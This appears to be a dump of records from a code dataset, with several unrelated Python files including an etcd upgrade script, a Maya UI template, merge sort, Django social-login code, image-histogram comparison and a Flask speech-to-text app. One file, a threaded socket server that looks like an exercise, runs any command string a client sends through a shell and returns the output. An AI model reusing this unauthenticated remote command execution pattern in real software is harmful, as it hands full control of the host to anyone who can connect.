('/sf/attribute/image/%s/download_%d'\n % (image_node, image.get('sequence', 0))),\n json.dumps(data, indent=4, sort_keys=True))\n\n if image.get('checksum'):\n etcd_client.put(\n '/sf/attribute/image/%s/latest_checksum' % image_node,\n json.dumps({'checksum': image.get('checksum')},\n indent=4, sort_keys=True))\n del image['checksum']\n\n etcd_client.put(\n '/sf/attribute/image/%s/state' % image_node,\n json.dumps({\n 'state': dbo.STATE_CREATED,\n 'state_updated': time.time()\n }, indent=4, sort_keys=True))\n\n new = baseobject.State(dbo.STATE_CREATED, time.time())\n etcd_client.put(\n '/sf/attribute/image/%s/state' % image_node,\n json.dumps(new.obj_dict(), indent=4, sort_keys=True))\n\n image['uuid'] = image_node\n image['ref'], image['node'] = image_node.split('/')\n image['version'] = 2\n etcd_client.put(metadata['key'],\n json.dumps(image, indent=4, sort_keys=True))\n print('--> Upgraded image %s to version 2' % image_node)\n\n # Find invalid networks\n for data, _ in etcd_client.get_prefix('/sf/network/'):\n n = json.loads(data.decode('utf-8'))\n bad = False\n try:\n netblock = ipaddress.ip_network(n['netblock'])\n if netblock.num_addresses < 8:\n bad = True\n except ValueError:\n bad = True\n\n if bad:\n for ni in networkinterface.interfaces_for_network(n):\n inst = instance.Instance.from_db(ni.instance_uuid)\n if inst:\n inst.enqueue_delete_due_error(\n 'Instance was on invalid network at upgrade.')\n else:\n print('--> Instance %s on invalid network, does '\n 'not exist in DB' % ni.instance_uuid)\n\n # NOTE(mikal): we have to hard delete this network here, or\n # it will cause a crash later in the Networks iterator.\n etcd_client.delete('/sf/network/%s' % n['uuid'])\n etcd_client.delete(\n '/sf/attribute/network/%s/state' % n['uuid'])\n print('--> Deleted invalid network %s (netblock too small)'\n % n['uuid'])\n continue\n\n # Upgrade networks to the new attribute style\n network = json.loads(data.decode('utf-8'))\n if int(network.get('version', 0)) < 2:\n data = {}\n for attr in ['state', 'state_updated', 'error_message']:\n if network.get(attr):\n data[attr] = network[attr]\n del network[attr]\n etcd_client.put(\n '/sf/attribute/network/%s/state' % network['uuid'],\n json.dumps(data, indent=4, sort_keys=True))\n\n if 'floating_gateway' in network:\n etcd_client.put(\n '/sf/attribute/network/%s/routing' % network['uuid'],\n json.dumps({'floating_gateway': network['floating_gateway']},\n indent=4, sort_keys=True))\n del network['floating_gateway']\n\n new = baseobject.State(dbo.STATE_CREATED, time.time())\n etcd_client.put(\n '/sf/attribute/network/%s/state' % n['uuid'],\n json.dumps(new.obj_dict(), indent=4, sort_keys=True))\n\n network['version'] = 2\n etcd_client.put(\n '/sf/network/%s' % network['uuid'],\n json.dumps(network, indent=4, sort_keys=True))\n print('--> Upgraded network %s to version 2'\n % network['uuid'])\n\n if minor <= 4:\n for old_name in old_style_nodes:\n # We do not observe() the new node, or set its release,\n # because we might not be running on that node and might\n # get the details wrong. 
Let the node do that thing.\n data = etcd_client.get('/sf/node/%s' % old_name)\n old_node = json.loads(data[0].decode('utf-8'))\n etcd_client.delete('/sf/node/%s' % old_name)\n\n n = Node.new(old_node['fqdn'], old_node['ip'])\n n._db_set_attribute('observed', {\n 'at': old_node['lastseen'],\n 'release': old_node['version']\n })\n print('--> Upgraded node %s to version 2' % old_name)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"shakenfist/client/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":16211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"572849263","text":"from algorithms.simulation import simulate\n\ndef run(base_grid, methods, variances, images = 1, output = True, iterations = 50):\n data = {}\n for method in methods:\n if output:\n print(\"variance test ({0})\".format(method))\n A = []\n for variance in variances:\n if output:\n print(\"variance = {0:.6f}\".format(variance))\n result = simulate(base_grid, method = method, images = images, variance = variance, iterations = iterations)\n A.append([variance] + result)\n data[method] = A\n return data\n","sub_path":"experiments/variances.py","file_name":"variances.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"16452512","text":"#Danielle SHwed\r\n#1310566\r\n#second question: journey.py\r\n\r\nclass Journey:\r\n \n\tdef __init__(self):\r\n\t\t#initialize odometer to 0 and two lists to empty\r\n\t\tself.odometer = 0\r\n\t\tself.leg_miles = []\r\n\t\tself.leg_gas = []\r\n\r\n\tdef setOdo(self, odoVal):\r\n\t\t#set odometer value\r\n\t\tself.odometer = odoVal\r\n\r\n\t\treturn self.odometer \r\n\r\n\tdef addLeg(self, milage, gasQuant):\r\n\t\t#append values to list\r\n\t\tself.leg_miles.append(milage)\r\n\t\tself.leg_gas.append(gasQuant)\r\n\r\n\tdef getLists(self):\r\n\t\treturn self.leg_miles, self.leg_gas\r\n\r\ndef main():\r\n\t#initialize variables\r\n\tcont = True\r\n\tmileTotal = 0\r\n\tgasTotal = 0\r\n\tperLitre = 0\r\n\tmyJourney = Journey()\r\n\r\n\tprint(\"when your journey is over simply press enter\")\r\n\r\n\t#while journey is still going\r\n\twhile cont == True:\r\n\r\n\t\tmiles = input(\"What is the mileage for the next leg of the journey?: \")\r\n\t\t#if user just pressed enter, then stop looping\r\n\t\tif miles == \"\":\r\n\t\t\tcont = False\r\n\r\n\t\telse:\r\n\t\t\t#if miles is an int, then ask for gas, then add another leg to the journey\r\n\t\t\tgas = float(input(\"What is the gas value for the next leg of the journey?: \")) # float() is safer than eval()\r\n\r\n\t\t\tmyJourney.addLeg(miles, gas)\t\r\n\r\n\tmileList, gasList = myJourney.getLists()\r\n\r\n\t#add up the journey\r\n\tfor i in mileList:\r\n\t\tmileTotal = mileTotal + int(i)\r\n\r\n\tfor i in gasList:\r\n\t\tgasTotal = gasTotal + int(i)\r\n\r\n\t#calculate miles per litre\r\n\tperLitre = mileTotal / gasTotal\r\n\r\n\tprint(\"Miles per litre for the trip: \"+ str(perLitre))\r\n\r\nmain()\r\n\r\n","sub_path":"journey.py","file_name":"journey.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"217478807","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nwindowTemplate.py\n\nCreated by Godfrey Huang on 2012-02-12.\nCopyright (c) 2012 Jean's Studios. 
All rights reserved.\n\"\"\"\nimport maya.cmds as cmds\n\nclass templateWindow(object):\n \"\"\"A base class for an options window\"\"\"\n\n @classmethod\n def showUI(cls):\n \"\"\"A function to instantiate the options window\"\"\"\n win = cls()\n win.create()\n return win\n\n '''\n @staticmethod\n def showUI():\n win = templateWindow()\n win.create()\n # return win\n '''\n def __init__(self):\n \"\"\"Initialize common data attributes\"\"\"\n ## unique window handle\n self.uiContent = {\n 'window' : 'ar_optionsWindow',\n 'title' : 'Options Window',\n 'size' : (546,350),\n 'supportsToolAction' : False,\n 'actionName': 'Apply and Close',\n }\n\n def create(self):\n \"\"\"Draw the window\"\"\"\n # delete the window if its handle exists\n if cmds.window(self.uiContent['window'], exists=True):\n cmds.deleteUI(self.uiContent['window'], window=True)\n # initialize the window\n self.uiContent['window'] = cmds.window(\n self.uiContent['window'],\n title=self.uiContent['title'],\n # widthHeight=self.uiContent['size'],\n menuBar=True\n )\n # main form for the window\n self.uiContent['mainForm'] = cmds.formLayout(\n nd=100,\n parent=self.uiContent['window'],\n )\n # create common menu items and buttons\n self.commonMenu()\n\n # see getOptionBox.mel for why we implement this layout pattern to emulate Maya's option boxes\n self.uiContent['optionsBorder'] = cmds.tabLayout(\n parent=self.uiContent['mainForm'],\n scrollable=True,\n tabsVisible=False,\n height=1,\n childResizable=True\n )\n # form to attach controls in displayOptions()\n self.uiContent['optionsForm'] = cmds.formLayout(\n nd=100,\n parent=self.uiContent['optionsBorder'],\n )\n self.displayOptions()\n # self.commonButtons()\n\n cmds.formLayout(\n self.uiContent['mainForm'], e=True,\n attachForm=(\n [self.uiContent['optionsBorder'],'top',0],\n [self.uiContent['optionsBorder'],'left',2],\n [self.uiContent['optionsBorder'],'right',2],\n \t\t\t\t[self.uiContent['optionsBorder'],'bottom',0], \n )\n )\n\n # show the window\n cmds.showWindow()\n \n def commonMenu(self):\n \"\"\"Create common menu items for all option boxes\"\"\"\n self.uiContent['editMenu'] = cmds.menu(label='Edit')\n self.uiContent['editMenuSave'] = cmds.menuItem(\n label='Save Settings',\n command=self.editMenuSaveCmd\n )\n self.uiContent['editMenuReset'] = cmds.menuItem(\n label='Reset Settings',\n command=self.editMenuResetCmd\n )\n self.uiContent['editMenuDiv'] = cmds.menuItem(d=True)\n self.uiContent['editMenuRadio'] = cmds.radioMenuItemCollection()\n self.uiContent['editMenuTool'] = cmds.menuItem(\n label='As Tool',\n radioButton=True,\n enable=self.uiContent['supportsToolAction'],\n command=self.editMenuToolCmd\n )\n self.uiContent['editMenuAction'] = cmds.menuItem(\n label='As Action',\n radioButton=True,\n enable=self.uiContent['supportsToolAction'],\n command=self.editMenuActionCmd\n )\n self.uiContent['helpMenu'] = cmds.menu(label='Help')\n self.uiContent['helpMenuItem'] = cmds.menuItem(\n label='Help on %s'%self.uiContent['title'],\n command=self.helpMenuCmd\n )\n def helpMenuCmd(self, *args):\n \"\"\"Override this method to display custom help\"\"\"\n cmds.launch(web='http://weibo.com/jeanim')\n def editMenuSaveCmd(self, *args):\n \"\"\"Override this method to implement Save Settings\"\"\"\n pass\n def editMenuResetCmd(self, *args):\n \"\"\"Override this method to implement Reset Settings\"\"\"\n pass\n def editMenuToolCmd(self, *args):\n \"\"\"Override this method to implement tool mode\"\"\"\n pass\n def editMenuActionCmd(self, *args):\n \"\"\"Override this method to 
implement action mode\"\"\"\n pass\n def actionBtnCmd(self, *args):\n \"\"\"Apply actions and close window\"\"\"\n self.applyBtnCmd()\n self.closeBtnCmd()\n def applyBtnCmd(self, *args):\n \"\"\"Override this method to apply actions\"\"\"\n pass\n def closeBtnCmd(self, *args):\n \"\"\"Close window\"\"\"\n cmds.deleteUI(self.uiContent['window'], window=True)\n def commonButtons(self):\n \"\"\"Create common buttons for all option boxes\"\"\"\n self.uiContent['commonBtnSize'] = ((self.uiContent['size'][0]-18)/3, 26)\n self.uiContent['actionBtn'] = cmds.button(\n parent=self.uiContent['mainForm'],\n label=self.uiContent['actionName'],\n height=self.uiContent['commonBtnSize'][1],\n command=self.actionBtnCmd\n )\n self.uiContent['applyBtn'] = cmds.button(\n parent=self.uiContent['mainForm'], \n label='Apply',\n height=self.uiContent['commonBtnSize'][1],\n command=self.applyBtnCmd\n )\n self.uiContent['closeBtn'] = cmds.button(\n parent=self.uiContent['mainForm'],\n label='Close',\n height=self.uiContent['commonBtnSize'][1],\n command=self.closeBtnCmd\n )\n cmds.formLayout(\n self.uiContent['mainForm'], e=True,\n attachForm=(\n [self.uiContent['actionBtn'],'left',5],\n [self.uiContent['actionBtn'],'bottom',5],\n [self.uiContent['applyBtn'],'bottom',5],\n [self.uiContent['closeBtn'],'bottom',5],\n [self.uiContent['closeBtn'],'right',5]\n ),\n attachPosition=(\n [self.uiContent['actionBtn'],'right',1,33],\n [self.uiContent['closeBtn'],'left',0,67]\n ),\n attachControl=(\n [self.uiContent['applyBtn'],'left',4,self.uiContent['actionBtn']],\n [self.uiContent['applyBtn'],'right',4,self.uiContent['closeBtn']]\n ),\n attachNone=(\n [self.uiContent['actionBtn'],'top'],\n [self.uiContent['applyBtn'],'top'],\n [self.uiContent['closeBtn'],'top']\n )\n )\n def displayOptions(self):\n \"\"\"Override this method to display options controls\"\"\"\n pass\n\nif __name__ == '__main__':\n testWindow = templateWindow()\n testWindow.create()\n\n","sub_path":"HTKG_script/Mel/UI/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":6892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"114554985","text":"\"\"\"\nMerge sort algorithm\n\nTime: O(nlogn) worst and average\nSpace: O(n)\n\"\"\"\ndef merge(arr, left, mid, right):\n \"\"\"\n Copy array elements into temporary array, so that sorted elements can\n be directly merged back into original array.\n \"\"\"\n temp = [0] * (right + 1) # sized so temp shares arr's absolute indices\n for k in range(left, right + 1):\n temp[k] = arr[k]\n\n i = left\n j = mid + 1\n k = left\n\n while i <= mid and j <= right:\n if temp[i] < temp[j]:\n arr[k] = temp[i]\n i += 1\n else:\n arr[k] = temp[j]\n j += 1\n k += 1\n\n # No need to copy j -> right as it's already\n # in the original array in its position\n for i in range(i, mid + 1):\n arr[k] = temp[i]\n k += 1\n\n return arr\n\ndef merge_sort(arr):\n def merge_sort_helper(arr, left, right):\n if left < right:\n # find the division point, partition based on position\n mid = left + (right-left)//2\n merge_sort_helper(arr, left, mid)\n merge_sort_helper(arr, mid + 1, right)\n merge(arr, left, mid, right) # mid is the last index of the left half\n\n merge_sort_helper(arr, 0, len(arr)-1)\n return arr\n\nif __name__ == '__main__':\n arr = [4, 2, 5, 6, 3, 1]\n print(merge_sort(arr))\n\n arr = [1, 2, 3, 4, 5, 6]\n print(merge_sort(
arr))\n","sub_path":"lib/mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"180881420","text":"#!/usr/bin/env python\r\n# -*- coding:utf-8 -*-\r\nimport os\r\nimport socketserver\r\nfrom socket import socket,AF_INET,SOCK_STREAM\r\nimport ssl,subprocess\r\nKEYFILE = 'server_key.pem' # private key\r\nCERTFILE ='server_cert.pem' # public key, sent to the client\r\n\r\n'''\r\ndef echo_client(s):\r\n while True:\r\n aa = s.recv(1024)\r\n if aa == b'':\r\n break\r\n print(str(aa,\"utf8\"))\r\n s.send(aa)\r\n s.close()\r\n print(\"connection closed\")\r\n'''\r\nclass Myserver(socketserver.BaseRequestHandler):\r\n def handle(self):\r\n print(\"sss\")\r\n conn = self.request\r\n print(\"starting..\",self.client_address)\r\n\r\n '''\r\n s_ssl = ssl.wrap_socket(s,\r\n keyfile=KEYFILE,\r\n certfile=CERTFILE,\r\n server_side=True,\r\n )\r\n '''\r\n '''\r\n while True:\r\n c,a = s_ssl.accept()\r\n print(\"conn to:\",a)\r\n #echo_client(c)\r\n while True:\r\n aa = c.recv(1024)\r\n if aa == b'':\r\n break\r\n print(str(aa,\"utf8\"))\r\n c.send(aa)\r\n c.close()\r\n print(\"connection closed\")\r\n '''\r\n Flag = True\r\n while Flag:\r\n data1 = conn.recv(1024)\r\n if not data1:\r\n break\r\n print(\"recv cmd:\",str(data1,'utf8'))\r\n cmd = str(data1,\"utf8\").strip()\r\n cmd_call = subprocess.Popen(cmd,shell=True, stdout=subprocess.PIPE)\r\n cmd_result = cmd_call.stdout.read()\r\n if len(cmd_result) == 0:\r\n cmd_result = b\"cmd execution has no output..\"\r\n\r\n ack_msg = bytes(\"CMD_RESULT_SIZE|%s\" %len(cmd_result) ,\"utf8\")\r\n\r\n conn.send(ack_msg)\r\n client_ack = conn.recv(50)\r\n if client_ack.decode() == 'CLIENT_READY_TO_RECV':\r\n conn.send(cmd_result)\r\n\r\nif __name__ == \"__main__\":\r\n server = socketserver.ThreadingTCPServer((\"127.0.0.1\",1234),Myserver)\r\n server.serve_forever()\r\n\r\n\r\n\r\n\r\n","sub_path":"day7/zuoye/back/ssl_server_duoxiancheng.py","file_name":"ssl_server_duoxiancheng.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"92051363","text":"# Authors: CS-World Domination Summer19 - DM\r\nimport cv2 as cv\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nimport os\r\nimport os.path\r\nimport shutil\r\nimport csv\r\nfrom prettytable import PrettyTable\r\n# NOTE: prettytable is only used to print the data so that it is more readable. 
It is otherwise unnecessary.\r\n# If you don't want to pip install prettytable then just comment out the respective code, it should all be in writeCSV()\r\n\r\ndef histCompare(baseFile, folderName, path):\r\n os.chdir(path)\r\n AllFiles = list(os.walk(path))[0][2]\r\n data = []\r\n # Take out the files we don't want to parse\r\n if '.DS_Store' in AllFiles:\r\n # NOTE: DS_Store files are an annoying Mac feature, if you aren't using MacOS you can delete this if statement\r\n ind = AllFiles.index('.DS_Store')\r\n AllFiles = AllFiles[:ind] + AllFiles[ind+1:]\r\n if baseFile in AllFiles:\r\n ind = AllFiles.index(baseFile)\r\n AllFiles = AllFiles[:ind] + AllFiles[ind+1:]\r\n # Create the histogram for our base image\r\n imageBase = cv.imread(baseFile, 1) # -1 bgra, 0 gray, 1 bgr\r\n histBase = cv.calcHist([imageBase],[0,1,2],None,[256,256,256],[0, 256, 0, 256, 0, 256])\r\n cv.normalize(histBase, histBase, alpha=0, beta=1, norm_type=cv.NORM_MINMAX) # BUG CHECK!!!\r\n # NOTE: You could also use hsv to compare images:\r\n # imageBase = cv.cvtColor(imageBase, cv.COLOR_BGR2HSV) \r\n for file in AllFiles:\r\n # Create the histograms for our comparison images\r\n imageToComp = cv.imread(file, 1) # -1 bgra, 0 gray, 1 bgr\r\n histToComp = cv.calcHist([imageToComp],[0,1,2],None,[256,256,256],[0, 256, 0, 256, 0, 256])\r\n cv.normalize(histToComp, histToComp, alpha=0, beta=1, norm_type=cv.NORM_MINMAX) # BUG CHECK!!!\r\n # Calculate comparisons and store to data\r\n result0 = cv.compareHist(histBase,histToComp,cv.HISTCMP_CORREL)\r\n result1 = cv.compareHist(histBase,histToComp,cv.HISTCMP_CHISQR)\r\n result2 = cv.compareHist(histBase,histToComp,cv.HISTCMP_INTERSECT)\r\n result3 = cv.compareHist(histBase,histToComp,cv.HISTCMP_BHATTACHARYYA)\r\n result4 = cv.compareHist(histBase,histToComp,cv.HISTCMP_KL_DIV)\r\n data.append([file, str(round(result0,4)), str(round(result1,4)), str(round(result2,4)), str(round(result3,4)), str(round(result4,4))])\r\n return data\r\n\r\ndef writeCSV(path, data):\r\n \" Takes our data and writes it to a csv file\"\r\n path = os.path.join(path, \"HistogramData.csv\")\r\n with open(path, 'w') as myCSVfile:\r\n print(\"Writing HistogramData.csv\")\r\n filewriter = csv.writer(myCSVfile, delimiter='\\n', quoting=csv.QUOTE_NONE, escapechar='\\\\')\r\n filewriter.writerow([\"File_Name,Correlation,Chi-square,Intersection,BHATTACHARYYA,Kullback-Leibler\"])\r\n t = PrettyTable([\"File_Name\", \"Correlation\", \"Chi-square\", \"Intersection\", \"BHATTACHARYYA\", \"Kullback-Leibler\"])\r\n for i in range(0,len(data)):\r\n filewriter.writerow([data[i][0] + ',' + data[i][1] + ',' + data[i][2] + ',' + data[i][3] + ',' + data[i][4] + ',' + data[i][5]])\r\n t.add_row([data[i][0], data[i][1], data[i][2], data[i][3], data[i][4], data[i][5]])\r\n print(t)\r\n return\r\n\r\ndef main():\r\n original_dir = os.getcwd()\r\n folderName = \"960x640 Flowers\"\r\n compFile = \"f1.jpg\"\r\n path = os.path.join(original_dir, folderName)\r\n data = histCompare(compFile, folderName, path)\r\n os.chdir(original_dir)\r\n writeCSV(original_dir, data)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"OpenCV-Examples/Image Histograms/comparing-histograms.py","file_name":"comparing-histograms.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"227304885","text":"from allauth.socialaccount.providers.facebook.views import FacebookOAuth2Adapter\nfrom allauth.socialaccount.providers.twitter.views import 
TwitterOAuthAdapter\nfrom allauth.socialaccount.providers.google.views import GoogleOAuth2Adapter\nfrom allauth.socialaccount.providers.oauth2.client import OAuth2Client\nfrom allauth.account.models import EmailAddress\nfrom allauth.exceptions import ImmediateHttpResponse\nfrom allauth.socialaccount.adapter import DefaultSocialAccountAdapter\nfrom rest_auth.registration.views import SocialLoginView\nfrom rest_auth.social_serializers import TwitterLoginSerializer\nfrom rest_framework.response import Response\nfrom rest_auth.views import LoginView\nfrom django.conf import settings\nfrom user.models import User\n\n\nclass FacebookLogin(SocialLoginView):\n adapter_class = FacebookOAuth2Adapter\n client_class = OAuth2Client\n callback_url = settings.CURRENT_URL + '/oauth/'\n\n def post(self, request, *args, **kwargs):\n self.callback_url = self.request.data['redirect_uri']\n self.request = request\n self.serializer = self.get_serializer(data=self.request.data)\n self.serializer.is_valid(raise_exception=True)\n\n self.login()\n return self.get_response()\n\n\nclass GoogleLogin(SocialLoginView):\n adapter_class = GoogleOAuth2Adapter\n client_class = OAuth2Client\n callback_url = settings.CURRENT_URL + '/oauth/'\n\n def post(self, request, *args, **kwargs):\n self.callback_url = self.request.data['redirect_uri']\n self.request = request\n self.serializer = self.get_serializer(data=self.request.data)\n self.serializer.is_valid(raise_exception=True)\n\n self.login()\n return self.get_response()\n\n\nclass TwitterLogin(LoginView):\n serializer_class = TwitterLoginSerializer\n adapter_class = TwitterOAuthAdapter\n\n\nclass SocialAccountAdapter(DefaultSocialAccountAdapter):\n def pre_social_login(self, request, sociallogin):\n \"\"\"\n Invoked just after a user successfully authenticates via a\n social provider, but before the login is actually processed\n (and before the pre_social_login signal is emitted).\n\n We're trying to solve different use cases:\n - social account already exists, just go on\n - social account has no email or email is unknown, just go on\n - social account's email exists, link social account to existing user\n \"\"\"\n\n # Ignore existing social accounts, just do this stuff for new ones\n if sociallogin.is_existing:\n return\n\n # some social logins don't have an email address, e.g. 
facebook accounts\n # with mobile numbers only, but allauth takes care of this case so just\n # ignore it\n if 'email' not in sociallogin.account.extra_data:\n return\n\n # check if given email address already exists.\n # Note: __iexact is used to ignore cases\n try:\n email = sociallogin.account.extra_data['email'].lower()\n email_address = EmailAddress.objects.get(email__iexact=email)\n\n # if it does not, let allauth take care of this new social account\n except EmailAddress.DoesNotExist:\n return\n\n # if it does, connect this new social login to the existing user\n user = email_address.user\n sociallogin.connect(request, user)\n","sub_path":"user/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"305015217","text":"import basetest\nimport requests\nimport json\n\n\nclass TestCaseBuildPackCustomHeaderConfig(basetest.BaseTest):\n def setUp(self):\n super().setUp()\n self.setUpCF(\n \"BuildpackTestApp-mx-7-16.mda\",\n env_vars={\n \"X_FRAME_OPTIONS\": \"DENY\",\n \"HTTP_RESPONSE_HEADERS\": json.dumps(\n {\n \"X-Permitted-Cross-Domain-Policies\": \"by-content-type\",\n \"Access-Control-Allow-Origin\": \"https://this.is.mydomain.nl\",\n \"X-XSS-Protection\": \"1; report=https://domainwithnewstyle.tld.consultancy\",\n \"X-Content-Type-Options\": \"nosniff\",\n }\n ),\n },\n )\n self.startApp()\n\n def _httpget(self):\n full_uri = \"https://\" + self.app_name\n response = requests.get(full_uri)\n return response\n\n def test_custom_header_settings(self):\n self.assert_app_running()\n response = self._httpget()\n self.assertIn(\"DENY\", response.headers[\"X-Frame-Options\"])\n self.assertIn(\n \"https://this.is.mydomain.nl\",\n response.headers[\"Access-Control-Allow-Origin\"],\n )\n self.assertIn(\"nosniff\", response.headers[\"X-Content-Type-Options\"])\n self.assertIn(\n \"by-content-type\",\n response.headers[\"X-Permitted-Cross-Domain-Policies\"],\n )\n self.assertIn(\n \"1; report=https://domainwithnewstyle.tld.consultancy\",\n response.headers[\"X-XSS-Protection\"],\n )\n","sub_path":"tests/usecase/test_buildpack_custom_headers.py","file_name":"test_buildpack_custom_headers.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"400249215","text":"from flask import Flask, render_template, url_for, send_file\nfrom flask_wtf.file import FileField, FileRequired, FileAllowed\nfrom flask_wtf import FlaskForm\nfrom wtforms import SelectField, SubmitField\nfrom werkzeug.utils import secure_filename\nfrom pydub import AudioSegment\n# create file ignored_file.py with SECRET_KEY\nfrom ignored_file import SECRET_KEY\nimport speech_recognition as sr\nimport os\nimport glob\nimport shutil\nimport subprocess\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = SECRET_KEY\n\nr = sr.Recognizer()\n\n\nclass UploadForm(FlaskForm):\n language = SelectField('Language', choices=['Russian: ru', 'English: en-US'])\n file = FileField(validators=[FileAllowed(['mp4'], 'MP4s only!'), FileRequired('File is empty!')])\n submit = SubmitField('Upload')\n\n\ndef get_large_audio(path, language, chunksize=60000):\n sound = AudioSegment.from_mp3(path)\n\n def divide_chunks(sound, chunksize):\n for i in range(0, len(sound), chunksize):\n yield sound[i:i + chunksize]\n\n chunks = list(divide_chunks(sound, chunksize))\n whole_text = ''\n folder_name = 'audio-chunks'\n if not os.path.isdir(folder_name):\n 
os.mkdir(folder_name)\n for index, chunk in enumerate(chunks):\n chunk.export(os.path.join(folder_name, f'chunk{index}.wav'), format='wav')\n with sr.AudioFile(os.path.join(folder_name, f'chunk{index}.wav')) as source:\n audio = r.record(source)\n try:\n text = r.recognize_google(audio, language=language)\n whole_text += f'{text} '\n except sr.UnknownValueError:\n print('The text could not be recognized')\n shutil.rmtree(os.path.abspath(folder_name))\n return whole_text\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef home():\n files_txt = glob.glob('txt/*.txt')\n for file in files_txt:\n os.remove(file)\n files_mp4 = glob.glob('*.mp3')\n for file in files_mp4:\n os.remove(file)\n files_mp4 = glob.glob('*.mp4')\n for file in files_mp4:\n os.remove(file)\n form = UploadForm()\n if form.validate_on_submit():\n folder_txt = 'txt'\n if not os.path.isdir(folder_txt):\n os.mkdir(folder_txt)\n filename = secure_filename(form.file.data.filename)\n form.file.data.save(filename)\n name_file = filename.split('.')[0]\n command = f'ffmpeg -i {filename} -b:a 320k {name_file}.mp3'\n subprocess.call(command)\n text_to_file = get_large_audio(f'{name_file}.mp3', language=form.language.data.split(': ')[1])\n text = open(f'txt/{name_file}.txt', 'w+', encoding='utf-8')\n text.write(text_to_file)\n text.close()\n return send_file(f'txt/{name_file}.txt', mimetype='txt', attachment_filename=f'{name_file}.txt',\n as_attachment=True)\n return render_template('index.html', form=form)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"101767820","text":"#!/usr/bin/env python\n\n'''\nCopyright (c) 2020 RIKEN\nAll Rights Reserved\nSee file LICENSE for details.\n'''\n\n\nimport log,traceback\n\nclass load:\n def __init__(self, args):\n log.logger.debug('started')\n try:\n # default\n self.genome_cov_thresholds=0.05 # Defining high coverage viruses relies greatly on this parameter\n self.ave_depth_of_mapped_region_threshold=3 # Defining high coverage viruses relies greatly on this parameter\n self.hisat2_mismatch_penalties='2,1'\n self.min_seq_len=20\n self.bedgraph_bin=1\n self.reconst_minimum_depth=1\n if args.ONT_bamin is True:\n self.reconst_minimum_depth=5\n if args.ONT_recon_min_depth is not None:\n if isinstance(args.ONT_recon_min_depth, int) is False:\n log.logger.error('No integer was specified with -ONT_recon_min_depth flag.')\n exit(1)\n self.reconst_minimum_depth= int(args.ONT_recon_min_depth)\n log.logger.info('%s was specified with -ONT_recon_min_depth flag. It will use %s.' 
% (args.ONT_recon_min_depth, args.ONT_recon_min_depth))\n self.ont_hhv6_ratio_threshold=2\n self.gzip_compresslevel=1\n self.metaspades_kmer='21,33,55'\n self.metaspades_memory=4\n self.quick_check_read_num=1000000\n \n params_for_debug=[]\n for k,v in self.__dict__.items():\n params_for_debug.append('%s=%s' % (k, str(v)))\n log.logger.debug('parameters:\\n'+ '\\n'.join(params_for_debug))\n except:\n log.logger.error('\\n'+ traceback.format_exc())\n exit(1)\n","sub_path":"scripts/load_parameters.py","file_name":"load_parameters.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"539985867","text":"import gensim\nimport re\nimport pathlib\nimport xml.etree.cElementTree as ET\nimport string\nfrom gensim.summarization.summarizer import summarize\nfrom gensim.summarization.textcleaner import split_sentences\nfrom gensim.summarization import keywords\ndef read_files(dir:pathlib.Path, recursive=False):\n\n for file in dir.glob(\"*.xml\"):\n print(str(file.absolute()))\n tree = ET.parse(file)\n body = tree.find(\"legis-body\")\n if body is None:\n body = tree.find(\"amendment-body\")\n if body is None:\n body = tree.find(\"resolution-body\")\n if body is None:\n body = tree.find(\"engrossed-amendment-body\")\n if body is None:\n print(file)\n exit(1)\n tBody = ET.ElementTree(body)\n child = ET.Element\n bodyText = \"\"\n # try:\n for child in tBody.iter(\"text\"):\n if child.text is not None:\n bodyText += child.text\n # except:\n # print(\"Something went wrong\", print(child))\n # print(file.name)\n # exit(1)\n cleanText = clean(bodyText)\n print(summarize(cleanText,ratio=0.05))\n print(keywords(cleanText, ratio = 0.1))\n\ndef clean(text:str): \n # # remove number chars\n # text = re.sub('\\d', '', text)\n # # remove certain special chars\n # text = text.replace('--', '').replace(' ','').replace('(', '').replace(')','').replace('$','')\n transTable = str.maketrans(',',',',string.punctuation + \"-()$\" + string.digits)\n transText = text.translate(transTable)\n # return the cleaned text so read_files() can summarize it\n return transText\n\ncwd = pathlib.Path.cwd()\ndir_path = pathlib.Path(\"data/gov_docs/BILLS-116-1-hr/\")\nread_files(cwd/dir_path)\n# convert text from file to a string\n# with open(\"congress.txt\", \"r\") as myfile:\n# text = (str(myfile.readlines()))\n\n# # remove number chars\n# text = re.sub('\\d', '', text)\n# # remove certain special chars\n# text = text.replace('--', '').replace(' ','').replace('(', '').replace(')','').replace('$','')\n\n# # create text file\n# File_object = open(\"newFile.txt\",\"w\")\n\n# # write to text file\n# #File_object.writelines(summarize(text , .05))\n# print(summarize(text 